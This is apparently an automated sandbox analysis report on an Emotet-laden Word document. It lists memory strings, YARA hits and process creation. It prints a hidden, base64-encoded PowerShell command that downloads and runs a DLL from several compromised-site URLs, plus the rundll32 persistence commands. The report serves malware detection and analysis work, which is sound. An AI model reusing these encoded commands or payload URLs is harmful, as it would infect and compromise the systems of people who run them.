Source: powershell.exe, 00000005.00000002.2169902002.0000000003C0F000.00000004.00000001.sdmp | String found in binary or memory: http://www.91yudao.com
Source: powershell.exe, 00000005.00000002.2169802370.0000000003AE8000.00000004.00000001.sdmp | String found in binary or memory: http://www.91yudao.com/wp-admin/KKHt1/
Source: rundll32.exe, 00000006.00000002.2179867646.0000000001BF0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2172743149.0000000000880000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2183679232.0000000002120000.00000002.00000001.sdmp, rundll32.exe, 0000000A.00000002.2207336767.0000000002120000.00000002.00000001.sdmp | String found in binary or memory: http://www.hotmail.com/oe
Source: rundll32.exe, 00000006.00000002.2180009760.0000000001DD7000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2174175186.0000000000A67000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2183809950.0000000002307000.00000002.00000001.sdmp | String found in binary or memory: http://www.icra.org/vocabulary/.
Source: rundll32.exe, 00000006.00000002.2179867646.0000000001BF0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2172743149.0000000000880000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2183679232.0000000002120000.00000002.00000001.sdmp, rundll32.exe, 0000000A.00000002.2207336767.0000000002120000.00000002.00000001.sdmp | String found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: powershell.exe, 00000005.00000002.2155549875.0000000000294000.00000004.00000020.sdmp | String found in binary or memory: http://www.piriform.com/ccleaner
Source: powershell.exe, 00000005.00000002.2155549875.0000000000294000.00000004.00000020.sdmp | String found in binary or memory: http://www.piriform.com/ccleanerv
Source: rundll32.exe, 0000000A.00000002.2207336767.0000000002120000.00000002.00000001.sdmp | String found in binary or memory: http://www.windows.com/pctv.
Source: powershell.exe, 00000005.00000002.2169902002.0000000003C0F000.00000004.00000001.sdmp | String found in binary or memory: http://yourcleanersurfaces.com
Source: powershell.exe, 00000005.00000002.2169802370.0000000003AE8000.00000004.00000001.sdmp | String found in binary or memory: http://yourcleanersurfaces.com/four-monks-acasz/O2my/
Source: powershell.exe, 00000005.00000002.2169802370.0000000003AE8000.00000004.00000001.sdmp | String found in binary or memory: https://fifacoinsbox.com/wp-content/7gYt/
Source: powershell.exe, 00000005.00000002.2169802370.0000000003AE8000.00000004.00000001.sdmp | String found in binary or memory: https://rbdck.com/wp-content/uploads/sucuri/lewfK/
Source: powershell.exe, 00000005.00000002.2169902002.0000000003C0F000.00000004.00000001.sdmp | String found in binary or memory: https://sectigo.com/CPS0D

E-Banking Fraud:

Yara detected Emotet
                      Source: Yara matchFile source: 00000014.00000002.2315698763.0000000000220000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000B.00000002.2216468622.00000000001B0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000B.00000002.2216501392.0000000000210000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000010.00000002.2272217705.0000000000200000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000017.00000002.2351060980.0000000000290000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000B.00000002.2217285925.0000000010000000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000E.00000002.2250563386.0000000000700000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.2208899018.0000000010000000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000016.00000002.2343132705.0000000000170000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000015.00000002.2328304138.0000000010000000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000C.00000002.2228390631.0000000000200000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000014.00000002.2315683097.0000000000200000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000016.00000002.2345794337.0000000010000000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000E.00000002.2253405198.0000000010000000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.2184720444.0000000010000000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.2171985440.0000000000160000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000010.00000002.2272239255.0000000000270000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.2193942063.00000000002B0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000F.00000002.2260117902.0000000000210000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000002.2293149466.00000000001A0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.2172275535.0000000000210000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000015.00000002.2326497204.00000000001C0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.2198337513.0000000010000000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000015.00000002.2326554651.0000000000300000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.2206030341.00000000001F0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000016.00000002.2343180402.0000000000190000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.2183134792.00000000001C0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.2183096664.00000000001A0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.2205979964.00000000001A0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000002.2294420728.0000000010000000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000C.00000002.2228409491.0000000000260000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000002.2293169935.00000000001C0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000E.00000002.2250329618.00000000006D0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000011.00000002.2282637087.00000000001B0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000017.00000002.2351041899.0000000000230000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000F.00000002.2261000236.0000000010000000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000013.00000002.2305216199.0000000000130000.00000040.00000001.sdmp, type: MEMORY

                      System Summary:

                      Very long command line found
                      Source: unknown | Process created: Commandline size = 5501
                      Source: unknown | Process created: Commandline size = 5400
                      Source: C:\Windows\System32\cmd.exe | Process created: Commandline size = 5400
                      Source: C:\Windows\SysWOW64\rundll32.exe | Process Stats: CPU usage > 98%
                      Source: C:\Windows\SysWOW64\rundll32.exe | Memory allocated: 76E20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exe | Memory allocated: 76D20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exe | File created: C:\Windows\SysWOW64\Eeyfocnhd\
                      Source: Mensaje-22-012021.doc | OLE, VBA macro line: Private Sub Document_open()
                      Source: VBA code instrumentation | OLE, VBA macro: Module M355vvc_qfa, Function Document_open
                      Source: Mensaje-22-012021.doc | OLE indicator, VBA macros: true
                      Source: rundll32.exe, 00000006.00000002.2179867646.0000000001BF0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2172743149.0000000000880000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2183679232.0000000002120000.00000002.00000001.sdmp, rundll32.exe, 0000000A.00000002.2207336767.0000000002120000.00000002.00000001.sdmp | Binary or memory string: .VBPud<_
                      Source: classification engine | Classification label: mal100.troj.evad.winDOC@44/8@4/3
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File created: C:\Users\user\Desktop\~$nsaje-22-012021.doc
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Mutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File created: C:\Users\user\AppData\Local\Temp\CVRDB9F.tmp
                      Source: Mensaje-22-012021.doc | OLE indicator, Word Document stream: true
                      Source: Mensaje-22-012021.doc | OLE document summary: title field not present or empty
                      Source: Mensaje-22-012021.doc | OLE document summary: edited time not present or 0
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j....0J|...............X.............}..v....0.......0...............................H...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................G..j......................X.............}..v....h.......0................G|.............H...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j....0J|...............X.............}..v....0.......0...............................H...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................G..j......................X.............}..v....h.......0................G|.............H...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j....0J|...............X.............}..v....0.......0...............................H...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................G..j......................X.............}..v....h.......0................G|.............H...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j....0J|...............X.............}..v....0.......0...............................H...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................G..j......................X.............}..v....h.......0................G|.............H...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j....0J|...............X.............}..v....0.......0...............................H...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................G..j......................X.............}..v....h.......0................G|.............H...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....'..................j....0J|...............X.............}..v....0&......0...............................H...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....'...............G..j.....&................X.............}..v....h'......0................G|.............H...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....3..................j....0J|...............X.............}..v....0.......0...............................H...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....3...............G..j......................X.............}..v....h/......0................G|.............H...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....?..................j....0J|...............X.............}..v....06......0...............................H...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....?...............G..j.....6................X.............}..v....h7......0................G|.............H...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....K..................j....0J|...............X.............}..v....0>......0...............................H...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....K...............G..j.....>................X.............}..v....h?......0................G|.............H...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....W..................j....0J|...............X.............}..v....0F......0...............................H...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....W...............G..j.....F................X.............}..v....hG......0................G|.............H...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....c..................j....0J|...............X.............}..v....0N......0...............................H...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....c...............G..j.....N................X.............}..v....hO......0................G|.............H...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....o..................j....0J|...............X.............}..v....0V......0...............................H...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....o...............G..j.....V................X.............}..v....hW......0................G|.............H...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....{..................j....0J|...............X.............}..v....0^......0...............................H...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....{...............G..j.....^................X.............}..v....h_......0................G|.............H...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j....0J|...............X.............}..v....0f......0...............................H...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................G..j.....f................X.............}..v....hg......0................G|.............H...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j....0J|...............X.............}..v....0n......0...............................H...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................G..j.....n................X.............}..v....ho......0................G|.............H...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j....0J|...............X.............}..v.....t......0.......................V.......H...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................G..j....8u................X.............}..v.....u......0................G|.............H...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j....0J|...............X.............}..v....`|......0...............................H...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................G..j.....}................X.............}..v.....}......0................G|.............H...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j....0J|...............X.............}..v............0.......................r.......H...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................G..j......................X.............}..v.... .......0................G|.............H...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v............ ..........j....0J|...............X.............}..v............0................F|.............H...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................G..j....h.................X.............}..v............0................G|.............H...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j....E.................X.............}..v.... .......0...............H.|.............H...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j....E.................X.............}..v.....!......0...............H.|.............H...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | WMI Queries: IWbemServices::ExecMethod - Win32_Process::Create
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File read: C:\Users\desktop.ini
                      Source: C:\Windows\System32\msg.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File read: C:\Windows\System32\drivers\etc\hosts
                      Source: unknown | Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\O3pp1b5\Y84vhdh\A41O.dll AnyString
                      Source: Mensaje-22-012021.doc | Virustotal: Detection: 61%
                      Source: Mensaje-22-012021.doc | Metadefender: Detection: 32%
                      Source: Mensaje-22-012021.doc | ReversingLabs: Detection: 62%
                      Source: unknown | Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
                      Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd cmd /c m^s^g %username% /v Wo^rd exp^erien^ced an er^ror tryi^ng to op^en th^e fi^le. & p^owe^rs^he^ll^ -w hi^dd^en -^e^nc IAAgAHMAZQBUAC0AVgBhAHIASQBhAGIAbABlACAAIAAoACcARwAnACsAJwBIAHAAJwApACAAIAAoAFsAdABZAFAAZQBdACgAIgB7ADMAfQB7ADIAfQB7ADUAfQB7ADQAfQB7ADYAfQB7ADEAfQB7ADAAfQAiAC0AZgAgACcAWQAnACwAJwBUAE8AUgAnACwAJwBZACcALAAnAFMAJwAsACcASQByACcALAAnAHMAdABlAG0ALgBJAG8ALgBkACcALAAnAEUAQwAnACkAIAAgACkAIAAgADsAIAAgACAAJABYAG8AMwA3AHQAIAAgAD0AIAAgAFsAVABZAHAARQBdACgAIgB7ADIAfQB7ADMAfQB7ADEAfQB7ADAAfQB7ADQAfQAiAC0AZgAnAE4AdABNAEEAbgBhAEcAZQAnACwAJwBtAC4AbgBFAHQALgBTAEUAUgBWAEkAQwBlAFAAbwBpACcALAAnAHMAWQBzAFQAJwAsACcAZQAnACwAJwBSACcAKQA7ACAAJABNAHAAZAB5AHIAXwAxAD0AJABOADUAXwBHACAAKwAgAFsAYwBoAGEAcgBdACgAMwAzACkAIAArACAAJABIADkAMgBLADsAJABHADgANQBWAD0AKAAnAFAAJwArACgAJwA1ACcAKwAnADcAQgAnACkAKQA7ACAAIAAoACAAIABpAFQAZQBNACAAKAAnAFYAQQAnACsAJwBSAGkAYQBiAEwAJwArACcAZQA6AEcASABQACcAKQApAC4AdgBBAGwAdQBlADoAOgAiAEMAUgBFAGAAQQB0AGAARQBEAGAAaQByAEUAQwB0AE8AcgB5ACIAKAAkAEgATwBNAEUAIAArACAAKAAoACcAewAwAH0ATwAzAHAAcAAxAGIAJwArACcANQB7ACcAKwAnADAAfQAnACsAKAAnAFkAOAA0AHYAaABkACcAKwAnAGgAJwApACsAJwB7ADAAfQAnACkAIAAgAC0ARgAgAFsAQwBIAGEAcgBdADkAMgApACkAOwAkAEMANAA2AFIAPQAoACcAQgA0ACcAKwAnADEASwAnACkAOwAgACgAIABkAGkAcgAgACAAdgBhAFIASQBhAEIAbABFADoAWABPADMANwB0ACAAIAApAC4AVgBhAGwAVQBlADoAOgAiAFMAZQBDAFUAcgBJAHQAYAB5AFAAcgBvAHQAbwBgAEMAYABvAEwAIgAgAD0AIAAoACgAJwBUACcAKwAnAGwAcwAxACcAKQArACcAMgAnACkAOwAkAEkANQAzAEgAPQAoACgAJwBDADEAJwArACcANQAnACkAKwAnAEUAJwApADsAJABQAGYAXwB3AHkAcwAzACAAPQAgACgAKAAnAEEAJwArACcANAAxACcAKQArACcATwAnACkAOwAkAEUANAAyAFQAPQAoACgAJwBEADcAJwArACcAMQAnACkAKwAnAEgAJwApADsAJABJADMAegAyAGMAcwByAD0AJABIAE8ATQBFACsAKAAoACgAJwBGAFoAbwBPACcAKwAnADMAJwArACcAcABwADEAJwApACsAKAAnAGIANQBGAFoAJwArACcAbwBZADgAJwArACcANAB2AGgAJwApACsAJwBkACcAKwAnAGgAJwArACgAJwBGAFoAJwArACcAbwAnACkAKQAuACIAcgBFAFAAYABMAGAAQQBDAEUAIgAoACgAJwBGACcAKwAnAFoAbwAnACkALABbAFMAVABSAGkAbgBHAF0AWwBjAGgAQQByAF0AOQAyACkAKQArACQ
AUABmAF8AdwB5AHMAMwArACcALgBkACcAIAArACAAJwBsAGwAJwA7ACQARQAwADQARQA9ACgAKAAnAFoAJwArACcAOQA5ACcAKQArACcAUQAnACkAOwAkAFMAOAA0AGgAOQBoAG4APQAnAGgAJwAgACsAIAAnAHQAdAAnACAAKwAgACcAcAAnADsAJABGAG8AdQBvADEAaAAxAD0AKAAoACcAeAAgACcAKwAnAFsAJwArACcAIABzAGgAIABiACcAKwAnADoALwAvAHUAJwApACsAKAAnAGEAZwAnACsAJwByACcAKQArACcAaQB0ACcAKwAnAGUAYwAnACsAJwBoACcAKwAoACcALgAnACsAJwBjAG8AJwApACsAKAAnAG0AJwArACcALwBjACcAKwAnAGcAaQAtAGIAJwApACsAJwBpACcAKwAoACcAbgAvACcAKwAnAGEANQBHACcAKwAnAC8AIQB4ACcAKQArACcAIABbACcAKwAoACcAIAAnACsAJwBzAGgAJwArACcAIAAnACsAJwBiADoALwAvACcAKwAnAHcAdwB3AC4AOQAxAHkAJwApACsAKAAnAHUAZABhACcAKwAnAG8AJwArACcALgBjAG8AJwApACsAKAAnAG0ALwB3AHAAJwArACcALQAnACsAJwBhAGQAJwApACsAKAAnAG0AaQBuAC8AJwArACcASwBLAEgAJwArACcAdAAnACkAKwAoACcAMQAvACEAeAAgAFsAJwArACcAIAAnACsAJwBzAGgAIABiACcAKwAnADoALwAnACkAKwAnAC8AJwArACgAJwB5AG8AJwArACcAdQByAGMAJwApACsAKAAnAGwAZQBhAG4AZQByAHMAdQByACcAKwAnAGYAYQAnACsAJwBjAGUAJwArACcAcwAnACkAKwAoACcALgBjAG8AbQAnACsAJwAvACcAKQArACgAJwBmAG8AJwArACcAdQByAC0AJwApACsAKAAnAG0AJwArACcAbwBuACcAKwAnAGsAcwAtAGEAYwBhAHMA
                      Source: unknown | Process created: C:\Windows\System32\msg.exe msg user /v Word experienced an error trying to open the file.
                      Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc IAAgAHMAZQBUAC0AVgBhAHIASQBhAGIAbABlACAAIAAoACcARwAnACsAJwBIAHAAJwApACAAIAAoAFsAdABZAFAAZQBdACgAIgB7ADMAfQB7ADIAfQB7ADUAfQB7ADQAfQB7ADYAfQB7ADEAfQB7ADAAfQAiAC0AZgAgACcAWQAnACwAJwBUAE8AUgAnACwAJwBZACcALAAnAFMAJwAsACcASQByACcALAAnAHMAdABlAG0ALgBJAG8ALgBkACcALAAnAEUAQwAnACkAIAAgACkAIAAgADsAIAAgACAAJABYAG8AMwA3AHQAIAAgAD0AIAAgAFsAVABZAHAARQBdACgAIgB7ADIAfQB7ADMAfQB7ADEAfQB7ADAAfQB7ADQAfQAiAC0AZgAnAE4AdABNAEEAbgBhAEcAZQAnACwAJwBtAC4AbgBFAHQALgBTAEUAUgBWAEkAQwBlAFAAbwBpACcALAAnAHMAWQBzAFQAJwAsACcAZQAnACwAJwBSACcAKQA7ACAAJABNAHAAZAB5AHIAXwAxAD0AJABOADUAXwBHACAAKwAgAFsAYwBoAGEAcgBdACgAMwAzACkAIAArACAAJABIADkAMgBLADsAJABHADgANQBWAD0AKAAnAFAAJwArACgAJwA1ACcAKwAnADcAQgAnACkAKQA7ACAAIAAoACAAIABpAFQAZQBNACAAKAAnAFYAQQAnACsAJwBSAGkAYQBiAEwAJwArACcAZQA6AEcASABQACcAKQApAC4AdgBBAGwAdQBlADoAOgAiAEMAUgBFAGAAQQB0AGAARQBEAGAAaQByAEUAQwB0AE8AcgB5ACIAKAAkAEgATwBNAEUAIAArACAAKAAoACcAewAwAH0ATwAzAHAAcAAxAGIAJwArACcANQB7ACcAKwAnADAAfQAnACsAKAAnAFkAOAA0AHYAaABkACcAKwAnAGgAJwApACsAJwB7ADAAfQAnACkAIAAgAC0ARgAgAFsAQwBIAGEAcgBdADkAMgApACkAOwAkAEMANAA2AFIAPQAoACcAQgA0ACcAKwAnADEASwAnACkAOwAgACgAIABkAGkAcgAgACAAdgBhAFIASQBhAEIAbABFADoAWABPADMANwB0ACAAIAApAC4AVgBhAGwAVQBlADoAOgAiAFMAZQBDAFUAcgBJAHQAYAB5AFAAcgBvAHQAbwBgAEMAYABvAEwAIgAgAD0AIAAoACgAJwBUACcAKwAnAGwAcwAxACcAKQArACcAMgAnACkAOwAkAEkANQAzAEgAPQAoACgAJwBDADEAJwArACcANQAnACkAKwAnAEUAJwApADsAJABQAGYAXwB3AHkAcwAzACAAPQAgACgAKAAnAEEAJwArACcANAAxACcAKQArACcATwAnACkAOwAkAEUANAAyAFQAPQAoACgAJwBEADcAJwArACcAMQAnACkAKwAnAEgAJwApADsAJABJADMAegAyAGMAcwByAD0AJABIAE8ATQBFACsAKAAoACgAJwBGAFoAbwBPACcAKwAnADMAJwArACcAcABwADEAJwApACsAKAAnAGIANQBGAFoAJwArACcAbwBZADgAJwArACcANAB2AGgAJwApACsAJwBkACcAKwAnAGgAJwArACgAJwBGAFoAJwArACcAbwAnACkAKQAuACIAcgBFAFAAYABMAGAAQQBDAEUAIgAoACgAJwBGACcAKwAnAFoAbwAnACkALABbAFMAVABSAGkAbgBHAF0AWwBjAGgAQQByAF0AOQAyACkAKQArACQAUABmAF8AdwB5AHMAMwArACcALgBkACcAIAArACAAJwBsAGwAJwA7ACQARQAwADQARQA9AC
gAKAAnAFoAJwArACcAOQA5ACcAKQArACcAUQAnACkAOwAkAFMAOAA0AGgAOQBoAG4APQAnAGgAJwAgACsAIAAnAHQAdAAnACAAKwAgACcAcAAnADsAJABGAG8AdQBvADEAaAAxAD0AKAAoACcAeAAgACcAKwAnAFsAJwArACcAIABzAGgAIABiACcAKwAnADoALwAvAHUAJwApACsAKAAnAGEAZwAnACsAJwByACcAKQArACcAaQB0ACcAKwAnAGUAYwAnACsAJwBoACcAKwAoACcALgAnACsAJwBjAG8AJwApACsAKAAnAG0AJwArACcALwBjACcAKwAnAGcAaQAtAGIAJwApACsAJwBpACcAKwAoACcAbgAvACcAKwAnAGEANQBHACcAKwAnAC8AIQB4ACcAKQArACcAIABbACcAKwAoACcAIAAnACsAJwBzAGgAJwArACcAIAAnACsAJwBiADoALwAvACcAKwAnAHcAdwB3AC4AOQAxAHkAJwApACsAKAAnAHUAZABhACcAKwAnAG8AJwArACcALgBjAG8AJwApACsAKAAnAG0ALwB3AHAAJwArACcALQAnACsAJwBhAGQAJwApACsAKAAnAG0AaQBuAC8AJwArACcASwBLAEgAJwArACcAdAAnACkAKwAoACcAMQAvACEAeAAgAFsAJwArACcAIAAnACsAJwBzAGgAIABiACcAKwAnADoALwAnACkAKwAnAC8AJwArACgAJwB5AG8AJwArACcAdQByAGMAJwApACsAKAAnAGwAZQBhAG4AZQByAHMAdQByACcAKwAnAGYAYQAnACsAJwBjAGUAJwArACcAcwAnACkAKwAoACcALgBjAG8AbQAnACsAJwAvACcAKQArACgAJwBmAG8AJwArACcAdQByAC0AJwApACsAKAAnAG0AJwArACcAbwBuACcAKwAnAGsAcwAtAGEAYwBhAHMAegAvAE8AJwApACsAJwAyAG0AJwArACcAeQAnACsAKAAnAC8AIQB4ACAAJwArACcAWwAnAC
                      Source: unknown | Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\O3pp1b5\Y84vhdh\A41O.dll AnyString
                      Source: unknown | Process created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\O3pp1b5\Y84vhdh\A41O.dll AnyString
                      Source: unknown | Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Users\user\O3pp1b5\Y84vhdh\A41O.dll',#1
                      Source: unknown | Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Eeyfocnhd\rdcslqee.tfa',YbeYBwKPvEN
                      Source: unknown | Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Eeyfocnhd\rdcslqee.tfa',#1
                      Source: unknown | Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ildimivpppjhtpz\eazqsushdwhbfu.ifu',kkHcNcnl
                      Source: unknown | Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ildimivpppjhtpz\eazqsushdwhbfu.ifu',#1
                      Source: unknown | Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Fmdnydfawb\oqvjuvcbq.olk',kIWFufWNhCJ
                      Source: unknown | Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Fmdnydfawb\oqvjuvcbq.olk',#1
                      Source: unknown | Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Qwyewmqcy\rawdlpqy.lat',jKmVZCpuSZSXyAJ
                      Source: unknown | Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Qwyewmqcy\rawdlpqy.lat',#1
                      Source: unknown | Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Cryxkxijzq\qqczujwsu.vhn',LFytx
                      Source: unknown | Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Cryxkxijzq\qqczujwsu.vhn',#1
                      Source: unknown | Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Qaatclqucsvpjzyl\gfpifopxbsfonqs.zax',MAwEWTVYSMc
